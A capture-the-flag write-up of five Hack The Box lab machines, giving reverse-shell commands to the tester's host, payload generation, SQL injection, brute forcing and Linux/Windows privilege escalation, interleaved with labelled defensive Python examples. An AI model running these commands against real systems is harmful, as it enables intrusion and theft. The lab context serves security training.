Write-up: Hack The Box: Starting Point — Tier 2

CyberJazz
15 min read · Feb 2, 2022

Tier 2 of the “Starting Point” series consists of six boxes: Archetype, Oopsie, Vaccine, Included and Markup.

Box 1: Archetype

This box is tagged “Windows”, “SMB” and “SQL”. It turns out we can login to the Windows shares with a guest account and get a shell from there.

Let’s scan it:

The nmap discovery script gives a hint that there might be a guest account which is able to authenticate as user. So let’s try it:

Questions:

  • Which TCP port is hosting a database server? 1433
  • What is the name of the non-Administrative share available over SMB? backups

We can try to log into the backups share and get a prompt:

$ smbclient \\\\10.129.116.192\\backups -U guest

It enables us to download the file prod.dtsConfig which contains a login password in the ConfiguredValue tag:

<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>

Now let’s try to login to the Microsoft SQL server with this password. For this purpose the impacket repository is very helpful.
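The prod.dtsConfig finding is a classic case of a connection string with an embedded password sitting on a share. The following is an added example (not part of the original write-up and not the box's own code) of the check a defender would run over such configuration files: it parses the XML, splits each ConfiguredValue as a key=value connection string, flags any entry carrying a Password/Pwd key and reports it with the secret redacted. The sample document, the configuration paths and the password value in it are constructed stand-ins.

```python
"""Scan an SSIS-style .dtsConfig file for embedded credentials (added example)."""
import xml.etree.ElementTree as ET

# Constructed sample modelled on the shape of the prod.dtsConfig fragment above;
# the account name and password are placeholders, not values from the box.
SAMPLE_DTSCONFIG = """<?xml version="1.0"?>
<DTSConfiguration>
  <Configuration ConfiguredType="Property" Path="\\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=PLACEHOLDER_PW;User ID=CORP\\svc_account;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;</ConfiguredValue>
  </Configuration>
  <Configuration ConfiguredType="Property" Path="\\Package.Properties[MaxConcurrentExecutables]" ValueType="Int32">
    <ConfiguredValue>4</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
"""

# Keys that carry a secret in OLE DB / SQL Server connection strings.
SECRET_KEYS = {"password", "pwd"}


def parse_connection_string(value):
    """Split 'k=v;k=v' into a dict with lowercased keys; fragments without '=' are skipped."""
    result = {}
    for part in value.split(";"):
        if "=" not in part:
            continue
        key, _, val = part.partition("=")
        result[key.strip().lower()] = val.strip()
    return result


def find_embedded_credentials(xml_text):
    """Return (config path, user id, redacted connection string) for every value holding a secret."""
    findings = []
    root = ET.fromstring(xml_text)
    for cfg in root.iter("Configuration"):
        node = cfg.find("ConfiguredValue")
        if node is None or not node.text:
            continue
        kv = parse_connection_string(node.text)
        if not (kv.keys() & SECRET_KEYS):
            continue
        redacted = ";".join(
            f"{k}={'<redacted>' if k in SECRET_KEYS else v}" for k, v in kv.items()
        )
        findings.append((cfg.get("Path"), kv.get("user id", "?"), redacted))
    return findings


if __name__ == "__main__":
    for path, user, conn_str in find_embedded_credentials(SAMPLE_DTSCONFIG):
        print(f"[!] credential in {path}: user={user} -> {conn_str}")
```

Run against a directory of exported package configurations, the same loop flags every connection string that should have been moved to a protected configuration or a credential store; "Persist Security Info=True" alongside a password is a second signal worth reporting.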

We can log in with:

impacket-mssqlclient 'ARCHETYPE/sql_svc':'M3g4c0rp123'@10.129.116.192 -windows-auth

We are not able to use standard SQL commands such as show databases; however, the help command shows that we can execute OS commands by calling xp_cmdshell.

  • What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server? mssqlclient.py
  • What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell? xp_cmdshell

With this, we can browse the directories and get the user flag. Now let’s try to get the root flag as well. For this we need to escalate to administrator privileges.

I tried to upload winpeas.exe to the server, but couldn't execute it because of missing privileges. So first of all, let's enable xp_cmdshell with the help of the commands specified in this cheatsheet.

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure;   -- enabling sp_configure as stated in the above error message
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Instead of running winpeas on the server directly, let's try to establish a netcat session first. For this, we can download nc.exe to the sql_svc user's folder. First we start an HTTP server in our local folder and open the listener:

$ python3 -m http.server 80
$ sudo nc -lnvp 443

And then download it to the server and call it:

SQL> xp_cmdshell curl http://10.10.14.71/nc.exe --output C:\Users\sql_svc\nc.exe
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc; .\nc.exe -e cmd.exe 10.10.14.71 443"

Now we have a shell! Let’s run winpeas again. We need to download it by clicking on the “raw” file (this was where I went wrong before). Then we upload it and run it just like we did with nc.exe. It returns a lot of output, among other things a readable console history file.

When we open it, we get the admin password.

  • What script can be used in order to search possible paths to escalate privileges on Windows hosts? winpeas
  • What file contains the administrator’s password? MEGACORP_4dm1n!!

With this, we can log in as admin user using the Impacket psexec.py package and find the root flag on the administrator's desktop.

$ impacket-psexec administrator@10.129.116.192

  • Submit user flag — Try by yourself!
  • Submit root flag — Try by yourself!

Box 2: Oopsie

This box is tagged “Linux”, “Web”, “PHP” and “SUID”. It turns out we can log into the web application by modifying the cookies, then upload a reverse shell and use the suid bit of a Linux binary to get root privileges.

Questions:

We see that there is a web service running on port 80. It is showing us a landing page of a company called “MegaCorp”. There is a hint that we might be able to login (“Please login to get access to the service”), but the login button is nowhere to be found.

dirb and gobuster don't find any path either. So let's check it with a Burp proxy as the last question suggested. Under the "Target" tab we can check the page's sitemap:

Besides the css/, themes/ and js/ folders that were already found with dirb, we also find a very interesting cdn-cgi/login link, which leads us to a login page.

  • What is the path to the directory on the webserver that returns a login page? cdn-cgi/login
  • What can be modified in Firefox to get access to the upload page? cookie

The page offers the opportunity to login as guest, so let’s do this and check what happens behind the scenes in Burp. We get re-directed to a page called login/admin.php. It shows the "Repair Management System". It seems that we might be able to login as admin user if we find the right user/role combination.

We can send it to Burp Intruder and test all numbers from 1 to 100 for the role “admin”. In order to generate a file with all numbers, we can use a little shell script.

i=0
while [ $i -le 200 ]
do
  echo $i >> numbers.txt
  i=$(($i+1))
done

Then we can load the numbers.txt file into Burp. This will test the user numbers 0 to 200 in combination with the usernames "admin", "superadmin" and "administrator". However, all of these tests are unsuccessful, so let's return to the page and check some more. Interestingly, there is a page called accounts, which simply passes the account ID as a GET parameter in the URL.

The account ID is not the same as the access ID. It turns out we can change the ID and retrieve arbitrary accounts, most importantly the admin user with id 1 and access ID 34322.

With this knowledge, we can modify our cookie to log in as the admin user with the help of the Match & Replace utility in Burp. Now we can view the “Upload” panel which requires admin rights. If we upload an arbitrary file, we don’t see where it has been uploaded.
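Two weaknesses combine here: the accounts page returns any record for any ID (an insecure direct object reference), and the role check trusts values that live in a client-editable cookie. The following is an added example, not code from the box or the write-up, contrasting that pattern with a server-side check in which the cookie carries only an opaque session token and both the role and the object-level permission are resolved from server state. The user table, session store and field names are assumed for illustration.

```python
"""Client-trusted role cookie vs server-side session lookup (added example)."""
import secrets

# Constructed user table standing in for the application's accounts.
USERS = {
    1: {"name": "admin", "role": "admin"},
    2: {"name": "guest", "role": "guest"},
}

# Server-side session store: opaque token -> user id. Only the server writes it.
SESSIONS = {}


def vulnerable_can_upload(cookies):
    """Trusts the role straight from the client-controlled cookie."""
    return cookies.get("role") == "admin"


def vulnerable_view_account(cookies, requested_id):
    """No object-level check: any caller can read any account by changing the id."""
    return USERS.get(requested_id)


def login(user_id):
    """Issue an opaque session token; the role itself is never sent to the client."""
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = user_id
    return token


def current_user(cookies):
    """Resolve the caller from the session store; unknown or missing token -> None."""
    return SESSIONS.get(cookies.get("session"))


def hardened_can_upload(cookies):
    """The role comes from the server-side record of the authenticated user."""
    user_id = current_user(cookies)
    return user_id is not None and USERS[user_id]["role"] == "admin"


def hardened_view_account(cookies, requested_id):
    """Object-level check: a user may only read their own record unless they are admin."""
    user_id = current_user(cookies)
    if user_id is None:
        return None
    if user_id != requested_id and USERS[user_id]["role"] != "admin":
        return None
    return USERS.get(requested_id)
```

With the hardened version, editing the cookie in Burp only changes an opaque token, and guessing another account's id on the accounts page returns nothing unless the session behind the token is allowed to see it.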

However, our previous scan with dirb revealed that there is a folder called uploads. In this folder, we can access the document (test.jpg) under its plaintext name.

This calls for a shell. Since the website is running on PHP, let’s try to upload a PHP reverse shell, for example the White Winter Wolf interactive shell. It is accepted, and when we visit the uploads folder, we get a webshell. Now we can search the directory for interesting files.

which nc reveals that the server has netcat installed. However, it turns out that the -c and -e options are disabled, so we can't connect to the outside with it. Instead, let's use a different webshell, php-reverse-shell from the /usr/share folder. Using this, we immediately get a shell on the system and can read the user flag from Robert. Before that, we upgrade the shell to a full tty with python3 -c 'import pty; pty.spawn("/bin/sh")'.

Also, we find some MySQL connection info in the db.php file of the www directory:

<?php $conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage'); ?>

It turns out that we can log in as user robert with su - robert and this password.

Let’s investigate the robert user further. He belongs to the group bugtracker:

$ groups robert
robert : robert bugtracker

(id gives more complete enumeration). sudo -l shows that he has no sudo permissions on the system. Let's see if the bugtracker group is more powerful.

$ find / -group bugtracker 2>/dev/null

reveals all files that belong to the bugtracker group. In our case there is only one, /usr/bin/bugtracker. Let's take a closer look at it: it has the "s" bit set for Set User ID upon execution (setuid).

$ ls -l /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25 2020 /usr/bin/bugtracker
$ file /usr/bin/bugtracker
/usr/bin/bugtracker: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=b87543421344c400a95cbbe34bbc885698b52b8d, not stripped

The setuid bit means that the program runs with root privileges even when it is started as user robert, because a file with SUID set always executes as the user who owns the file, regardless of who runs it.

  • What executable is run with the option “-group bugtracker” to identify all files owned by the bugtracker group? find
  • Regardless of which user starts running the bugtracker executable, whose user privileges will it use to run? root
  • What does SUID stand for? Set owner User ID

Let’s run the script to see what it does:

It collects some data out of files. Let’s try it again with a less likely number:

And we see that the program calls the cat command. Note that it calls plain cat, not /bin/cat, so the command is looked up via PATH. This means we might be able to shadow the real cat with our own binary by adding its directory to the beginning of PATH.

The current path is:

robert@oopsie:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

so let’s add a local path tmp with a new binary.

robert@oopsie:~$ export PATH=/tmp:$PATH

Now the tmp folder is searched before the /bin folder. There we create a file cat with the following content: /bin/sh and make it executable. Now we get the root shell and can submit the root flag.
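The mechanism at work is ordinary PATH lookup: the first executable named cat along the search path wins, so a world-writable directory in front of /bin decides what a privileged program ends up running. The following added example (not code from the box; the bugtracker binary itself is not reproduced) models that lookup in Python, shows the two defensive checks a reviewer of a setuid program would apply, namely pinning PATH to a trusted value before spawning children and auditing the search path for directories other users can write to, and uses a constructed temporary directory as a stand-in for /tmp. TRUSTED_PATH is an assumed value.

```python
"""PATH lookup of a bare command name versus a pinned path (added example)."""
import os
import stat
import tempfile

# Assumed trusted search path that a privileged program should set for itself
# instead of inheriting whatever the caller exported.
TRUSTED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def resolve_command(name, path):
    """First executable file named `name` along `path`, in order, like a shell does."""
    for directory in path.split(os.pathsep):
        if not directory:
            continue
        candidate = os.path.join(directory, name)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def audit_path(path):
    """Directories on `path` that other users can write to (anyone could drop a 'cat' there)."""
    risky = []
    for directory in path.split(os.pathsep):
        if directory and os.path.isdir(directory):
            if os.stat(directory).st_mode & stat.S_IWOTH:
                risky.append(directory)
    return risky


def make_shadow_dir(name):
    """Constructed stand-in for /tmp: a world-writable dir holding an executable `name`."""
    directory = tempfile.mkdtemp(prefix="shadow-")
    os.chmod(directory, 0o1777)
    shadow = os.path.join(directory, name)
    with open(shadow, "w") as handle:
        handle.write("#!/bin/sh\necho 'shadowed'\n")
    os.chmod(shadow, 0o755)
    return directory


def pinned_environment():
    """Environment a privileged program should hand to its child processes."""
    env = dict(os.environ)
    env["PATH"] = TRUSTED_PATH
    return env


def demo():
    """Show what `export PATH=/tmp:$PATH` changes and what pinning PATH restores."""
    shadow = make_shadow_dir("cat")
    user_path = shadow + os.pathsep + TRUSTED_PATH
    return {
        "shadow_dir": shadow,
        "resolved_under_user_path": resolve_command("cat", user_path),
        "resolved_under_pinned_path": resolve_command("cat", pinned_environment()["PATH"]),
        "writable_dirs_on_user_path": audit_path(user_path),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The same audit_path check is useful on the real system too: any world-writable entry in the PATH of a cron job, a service or a setuid helper is a finding, independent of whether a relative command name has been spotted yet.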

  • What is the name of the executable being called in an insecure manner? cat
  • Submit user flag — Try by yourself!
  • Submit root flag — Try by yourself!

Box 3: Vaccine

This box is tagged “Linux”, “FTP”, “SQL” and “SUID”.

The nmap scan shows that there is an FTP server which allows anonymous login and provides a file called backup.zip. We can download it and try to unzip it, but it requires a password.

  • Besides SSH and HTTP, what other service is hosted on this box? FTP
  • This service can be configured to allow login with any password for specific username. What is that username? anonymous
  • What is the name of the file downloaded over this service? backup.zip

Also, we have a Webserver on port 80 called “MegaCorp Login” with a login page. I tried to bomb it with the default credentials, but there was no hit.

So let’s go back to the backup.zip-file and try to crack it. We can use zip2john for this, following this tutorial. First we generate the hash file, and then we crack it using the standard wordlist from john.

$ zip2john backup.zip > hash.txt
$ john hash.txt
$ unzip backup.zip

The password is 741852963 (= a pattern on a num pad).

And in the backup file, we find a hard-coded password:

<?php
session_start();
if(isset($_POST['username']) && isset($_POST['password'])) {
  if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
    $_SESSION['login'] = "true";
    header("Location: dashboard.php");
  }
}
?>

Let’s see if it still works. First we need to recover the plaintext password from the md5 hash. Let’s use hashcat for this. First we double-check that the hash is really md5 using hashid -m <hash>. Then we run hashcat with a short wordlist, but without success. However, with rockyou.txt we get the answer within seconds.

We get redirected to the dashboard. There we get a table with database output. The search string is submitted via an URL parameter.

Let’s see if SQL injection is possible here. For example, we can enumerate the number of columns by injecting ' ORDER BY X-- -. With 6, we get an error message:

But we can also do it the easy way and use sqlmap. With this command, we get a shell as postgres user:

$ sqlmap -u 'http://10.129.117.4/dashboard.php' --data 'search=P' --cookie='PHPSESSID=ton2h67hjn3plqh6r9k496dpe0' --os-shell
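The dashboard is injectable because the search string is pasted into the SQL text, which is exactly why ' ORDER BY X-- - can change the statement instead of being searched for. The following added example (not the box's PHP or sqlmap's logic) runs that same input through a string-built query and a parameterized one on an in-memory SQLite table with constructed rows: in the first the ORDER BY probe reorders or breaks the query, in the second it is just a string nobody's name matches. The table layout and row values are made up for the example.

```python
"""Same search term through a string-built query and a parameterized one (added example)."""
import sqlite3


def make_db():
    """Constructed stand-in for the dashboard's table; rows are made up."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cars (id INTEGER, name TEXT, type TEXT)")
    conn.executemany("INSERT INTO cars VALUES (?, ?, ?)", [
        (1, "Alpha", "Sedan"),
        (2, "Beta", "Hatchback"),
        (3, "Gamma", "Sports"),
    ])
    return conn


def vulnerable_search(conn, term):
    """Builds SQL by string formatting: the term is parsed as SQL syntax."""
    sql = f"SELECT name, type FROM cars WHERE name LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def safe_search(conn, term):
    """Bound parameter: the term is only ever data, whatever characters it contains."""
    sql = "SELECT name, type FROM cars WHERE name LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()


def query_errors(conn, term):
    """True if the string-built query fails for this term (the error the write-up saw at 6)."""
    try:
        vulnerable_search(conn, term)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    probe = "' ORDER BY 3-- -"
    print("vulnerable query errors on probe:", query_errors(db, probe))
    print("parameterized query result for probe:", safe_search(db, probe))
    print("parameterized query result for 'lph':", safe_search(db, "lph"))
```

The error-on-N behaviour is the column-count signal the write-up describes; with the bound parameter there is no N at which anything changes, so neither manual enumeration nor sqlmap gets a foothold through this input.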

Then we get a very simple shell, but we need to expand it. Unfortunately most commands from this cheatsheet don’t work, and calling a shell with netcat doesn’t work either although it’s installed on the server. However we can get a shell with the following bash command:

os-shell> bash -c "bash -i >& /dev/tcp/10.10.14.71/443 0>&1"

After that we can stabilize the shell with python3 -c 'import pty; pty.spawn("/bin/bash")'. From there we can get the user flag. Now let's see if we can find any password, because often the database is connected from PHP using a cleartext password. And indeed, we find it in the www folder in the dashboard.php file:

try { $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!"); }

Maybe the local user postgres is using the same password. Let's try by calling sudo -l, which should deliver us all executables that the user is allowed to use.

Nice! According to GTFOBins, we can spawn a root shell with this. Let’s run the command: sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf. The output is rather strange as we don't have a fully functional terminal, but typing :!/bin/sh works anyway and we get a root shell.

  • What program can the postgres user run as root using sudo? vi
  • Submit user flag — Try by yourself!
  • Submit root flag — Try by yourself!

Box 4: Included

This box is tagged “Linux”, “FTP”, “Java”, “PHP” and “LFI”.

The regular top-1000 nmap scan returns only a webserver on port 80. Since the next question asks for a UDP port, let’s scan that additionally.

Scanning for the top 100 UDP ports returns a dhcpc service on port 68 and a tftp service on port 69.

We can access the service without a password, but directory listing is not possible and thus we don’t know which files could potentially be downloaded.

Next, let’s check the webserver running on port 80. The start page already shows that some file is included.

It turns out we can even access files outside of the web directory.
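An include parameter that reaches files outside the web directory is a path-containment failure: the value is joined onto the document root without checking where the result ends up. The following added example (not the box's PHP) shows the naive join beside a resolver that canonicalises the path, requires it to stay under the document root and only then consults an allowlist of pages the include is meant to serve. WEB_ROOT and the allowlisted page names are assumed for illustration.

```python
"""Resolving a ?file= parameter so that it cannot leave the document root (added example)."""
import os

# Assumed document root; realpath so a symlinked root still compares correctly.
WEB_ROOT = os.path.realpath("/var/www/html")

# Assumed allowlist of pages the include is meant to serve.
ALLOWED_PAGES = {"home.php", "about.php"}


def resolve_unsafe(param):
    """Plain join: '../' sequences and absolute parameters both leave the root."""
    return os.path.normpath(os.path.join(WEB_ROOT, param))


def resolve_safe(param):
    """Canonicalise, keep the result under WEB_ROOT, then require an allowlisted page."""
    candidate = os.path.realpath(os.path.join(WEB_ROOT, param))
    # commonpath collapses to '/' (or another prefix) as soon as the path escapes the root
    if os.path.commonpath([WEB_ROOT, candidate]) != WEB_ROOT:
        return None
    if os.path.relpath(candidate, WEB_ROOT) not in ALLOWED_PAGES:
        return None
    return candidate


if __name__ == "__main__":
    for value in ("home.php", "../../../etc/passwd", "/etc/passwd", "./sub/../home.php"):
        print(f"{value!r:28} unsafe -> {resolve_unsafe(value)}  safe -> {resolve_safe(value)}")
```

The containment check alone already stops traversal and absolute paths; the allowlist is the second layer, and is what keeps a path like /var/www/html/.htpasswd from being served even though it lives inside the root.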

In order to exploit the vulnerability, we further enumerate the server. gobuster doesn't reveal any further interesting directories, but reveals that the files .htaccess and .htpasswd might exist on the server.

And correct, we find the credentials for the user Mike in cleartext in the .htpasswd file.

Besides the password file, we might also use the open TFTP server to upload a webshell and execute it via the LFI. Let’s create a shell with meterpreter:

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.16.18 LPORT=4444 -f raw > shell.php

Before we upload the shell, we need to remove the comment from the beginning of the file and add a ?> to the end. Next, we upload this shell to the TFTP server (with put shell.php) and start the listener with msfconsole. Then we access the file at ?file=/var/lib/tftpboot/shell.php, but unfortunately the session fails.

The next try is with /usr/share/webshells/php/php-reverse-shell.php from Kali Linux. This one works and we get a shell:

  • What is the default system folder that TFTP uses to store files? /var/lib/tftpboot
  • Which interesting file is located in the web server folder and can be used for Lateral Movement? .htpasswd

Now let’s log in as user Mike and see what else we can do there. sudo -l returns nothing helpful, but Mike is a member of the lxd group. We will see how to use that.

According to this article, we can escalate to root privileges if we follow the steps described there.

These are the steps: On our machine, we download the alpine image and create the tar.gz file.

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

Then we start a python web server on our machine and fetch the file with wget from the victim machine. After that we follow the commands from the blog post and get root privileges.

lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

  • What flag do we set to the container so that it has root privileges on the host system? security.privileged=true
  • If the root filesystem is mounted at /mnt in the container, where can the root flag be found on the container after the host system is mounted? /mnt/root/root
  • Submit user flag — Try by yourself!
  • Submit root flag — Try by yourself!

Box 5: Markup

This box is tagged “Windows” and “XXE”.

The nmap scan reveals a web server on ports 80 and 443 as well as an SSH server on port 22.

Visiting the website, we see a login page.

We can catch the POST-Request to the webserver with Burp Suite. We see that it uses the payload username=xx&password=yy and returns "Wrong Credentials" if the password is wrong.

We can feed this information into hydra and run a brute force scan. After a few trials, we get a hit.

$ hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/Common-Credentials/best15.txt 10.129.108.32 http-post-form "/:username=^USER^&password=^PASS^:Wrong Credentials" -V

The combination that works is admin:password.

We get to a very simple shop system. The “Order” tab is accepting user input.

Let’s see how it looks like in Burp:

The user input is processed as XML data. So maybe we can use an XXE (XML External Entity) injection attack on it.

  • What is the word at the top of the page that accepts user input? order
  • What XML version is used on the target? 1.0
  • What does the XXE / XEE attack acronym stand for? XML External Entity
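The order form is exploitable because the server-side parser honours a DTD in the submitted document, so an entity declared there can pull in a file. The following added example (not the box's code; the real application is not written in Python) shows the intake check a defender would put in front of such a form: any document carrying a DOCTYPE is refused before it reaches the parser, which blocks external entities and internal entity-expansion bombs alike, and the remaining document is validated against the fields the form expects. The field names and both sample documents are constructed, and the SYSTEM identifier in the rejected sample is a placeholder.

```python
"""Refuse DTDs on an XML order endpoint, then validate the fields (added example)."""
import re
import xml.etree.ElementTree as ET

# Constructed order in the shape the "Order" form submits (field names assumed).
GOOD_ORDER = b"""<?xml version="1.0" encoding="UTF-8"?>
<order><quantity>2</quantity><item>Home Appliances</item><address>1 Example St</address></order>"""

# Same document with a DTD attached. The declaration itself is the signal;
# the SYSTEM identifier is a placeholder, not a real target.
DTD_ORDER = b"""<?xml version="1.0"?>
<!DOCTYPE order [ <!ENTITY ext SYSTEM "file:///PLACEHOLDER/path"> ]>
<order><quantity>2</quantity><item>&ext;</item><address>1 Example St</address></order>"""

REQUIRED_FIELDS = {"quantity", "item", "address"}
DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)


class RejectedXML(ValueError):
    """Raised for any submission that is not a plain, well-formed order document."""


def parse_order(raw):
    """Return {field: text} for a valid order; raise RejectedXML otherwise."""
    if DOCTYPE_RE.search(raw):
        # No legitimate order needs a DTD; refusing it removes external entities,
        # parameter entities and billion-laughs style expansion in one step.
        raise RejectedXML("DOCTYPE/DTD not allowed in order submissions")
    try:
        root = ET.fromstring(raw)
    except ET.ParseError as exc:
        raise RejectedXML(f"malformed XML: {exc}") from exc
    if root.tag != "order":
        raise RejectedXML(f"unexpected root element <{root.tag}>")
    fields = {child.tag: (child.text or "").strip() for child in root}
    missing = REQUIRED_FIELDS - fields.keys()
    if missing:
        raise RejectedXML(f"missing fields: {sorted(missing)}")
    return fields


def is_rejected(raw):
    """Convenience wrapper for the accept/reject decision."""
    try:
        parse_order(raw)
        return False
    except RejectedXML:
        return True


if __name__ == "__main__":
    print("good order ->", parse_order(GOOD_ORDER))
    print("order with DTD rejected ->", is_rejected(DTD_ORDER))
```

Rejecting the DOCTYPE up front is deliberately parser-independent: it does not rely on knowing how a given XML library is configured, which is the usual reason XXE survives in production code. In the application's own language the equivalent hardening is to keep external entity loading disabled in the XML library and still reject DTDs at the boundary.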

But first, let’s enumerate further. We can find a user “Daniel” in the source code:

Who knows, maybe Daniel still has an account on the server?

Now let’s try to exploit the XXE. Here are some useful payloads. Unfortunately I didn’t manage to get this without the walkthrough, because I was trying a little different payload and a different file.

Next, we can try to see if “Daniel” has an account on the machine, and if we might even be able to access his ssh-keys. And yes, it works:

We copy the content to a file and adjust the permissions with chmod 600 id_rsa. Then we can login:

$ ssh daniel@10.129.108.32 -i id_rsa

After a bit of poking, we find an interesting folder called “log-management” with a bat-file inside.

This is the file content:

We can see that it calls the executable wevtutil.exe without specifying the path, and it runs with administrator privileges. Let's double-check the permissions on the file with icacls:

Since we have full write permissions on the file, we can modify it to execute our own program, for example netcat. First we get nc.exe onto the victim machine. Then we simply overwrite the job.bat file with our content.

PS > wget http://10.10.16.18/nc64.exe -O nc.exe
PS > echo "C:\Log-Management\nc64.exe -e cmd.exe 10.10.16.18 443" > C:\Log-Management\job.bat
PS > type job.bat
C:\Log-Management\nc64.exe -e cmd.exe 10.10.16.18 443

In the beginning I tried the exploit with the nc.exe file from the /usr/share/windows-resources/binaries/ folder on Kali, but it didn't work. So I downloaded nc64.exe from Github. After a few seconds, I received the shell.

  • Submit user flag — Try by yourself!
  • Submit root flag — Try by yourself!

Originally published at https://www.cyberjazz.de on February 2, 2022.
